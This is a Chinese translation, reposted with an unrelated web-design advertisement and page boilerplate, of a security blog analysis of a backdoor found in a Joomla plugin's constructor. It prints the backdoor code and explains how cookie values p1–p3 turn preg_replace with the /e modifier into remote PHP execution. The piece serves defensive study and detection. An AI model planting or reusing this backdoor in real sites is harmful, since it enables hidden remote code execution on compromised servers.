Joomla插件构造函数后门分析

本文介绍我们在Joomla插件中发现的一个有趣的后门。

创新互联服务项目包括平川网站建设、平川网站制作、平川网页制作以及平川网络营销策划等。多年来,我们专注于互联网行业,利用自身积累的技术优势、行业经验、深度合作伙伴关系等,向广大中小型企业、政府机构等提供互联网行业的解决方案,平川网站推广取得了明显的社会效益与经济效益。目前,我们服务的客户以成都为中心已经辐射到平川省份的部分城市,未来相信会继续扩大服务区域并继续获得客户的支持与信任!

尽管感觉有点不太对劲,不过由于代码组织良好,最开始我们没有意识到里面包含后门。插件的代码如下所示:

乍一看没什么特别的,没有代码加密,没有代码混淆,也没什么注释,就是正常的Joomla插件代码。

但是如果仔细研究就会发现,类的构造函数不太正常:

public function __construct() {

$filter = JRequest::getString('p3', Null, 'cookie');

if ($filter) {

$option = $filter(JRequest::getString('p2', Null, 'cookie'));

$auth = $filter(JRequest::getString('p1', Null, 'cookie'));

$option("/123/e",$auth,123);

die();

}

}

第一个真正可疑的是代码结尾处的die();,该函数会终止脚本的执行,放在Joomla插件中,表示该函数会终止Joomla的执行。插件不应该这么做,特别是在初始化阶段。

另外,读者可能已经注意到了字符串“/123/e”,类似于许多基于preg_replace的后门中“eval”标记的正则表达式匹配模式。这么一看就会发现,如果用preg_replace替换掉$option,恰好得到一句经典的gre_replace后门代码:

preg_replace("/123/e", $auth, 123);

123总是与123匹配,所以这段代码总是会取得$auth变量的值,不管这个值是什么。

为了使该假设变成真,$option应该等价于“preg_replace”,$auth应该包含PHP功能代码。那么这种想法是否可行呢?我们可以看到这两个变量都是用cookie值填充的,所以,是的,这种想法是可行的。

通过分析代码可以看到该后门以如下方式运行:

1,Joomla中启用该插件后,会在每个页面加载,因此插件的类的构造函数总能得到执行。

2,攻击者可以通过设置以下cookie请求网站的任意页面:

p3 - 该变量触发后门执行,如果没有该变量,Joomla会正常执行。

p2 - 该变量的值应该设置为“preg_replace”、

p1 - 任意PHP功能代码

整个插件都是恶意代码吗

我之前的文章中提到,恶意代码被植入到Wordpress插件后被重新打包成盗版商业插件,但与此不同的是,本文提到的Joomla插件看起来不像是站长从某个小网站弄来的,该插件名为InstantSuggest,是一款免费插件,并不怎么流行(下载量小于400)。其官方代码中不包含__construct()函数。

可以看到源码中的漏洞已经补上了,因此最有可能的情况是黑客黑进该站点后添加了这个后门。事实上我们也是在一个被黑网站上发现这个后门的(这个没什么可惊喜的,我们的大部分工作都是与被黑站点打交道)。

另外,黑客不是仅仅将后门注入到某个插件中,而是安装到某个已经打过补丁的插件里,这样看起不可疑,也不会破坏任何东西。这比修改网站中现有的文件要容易一些,因为修改网站现有文件时有时候可能会会破坏网站,因此需要更复杂的injector。

为证明这一假设,我们搜索了网络中包含该后门代码的网站,发现几乎全都包含在instantsuggest代码中——我不相信所有这些网站都是主动安装了这个不知名的插件。另外,这段恶意代码也被用在了Joomla上下文之外,将Joomla API请求替换为简单的@$_COOKIE调用(可参考cPanel论坛)。即使在这些案例中,其仍然被包含在instantsuggest代码中——这么做只是为了使后门看起来不那么可疑。

To 站长:

如读者所见,黑客可以可很容易将后门隐藏在我们的眼皮底下,当人工审查代码时很难将其辨识出来,特别是像Joomla这种包含上千个文件的系统,安全扫描器也可能无法识别这种不常见的后门。检测这种后门唯一可靠的方法就是完整性控制,当检测到文件被修改时提供向站长提供警报,使站长可以立即解决可能产生的问题。许多版本控制系统可以完成这种工作 ,如果读者启用我们的Sucuri监控服务中的服务端扫描,也可以发现服务中的完整性控制功能。

还需要说明的是,通过cookie向后门中传递恶意代码已经成为趋势,利用这种方式,黑客可以使用常规GET请求,这样就不会在web服务日志分析系统中产生任何可疑操作。要检测并阻止这种请求,站长需要一款更高级的website防火墙解决方案。

原文地址:http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html

当前题目:Joomla插件构造函数后门分析
文章分享:http://www.gawzjz.com/qtweb/news45/178545.html

网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联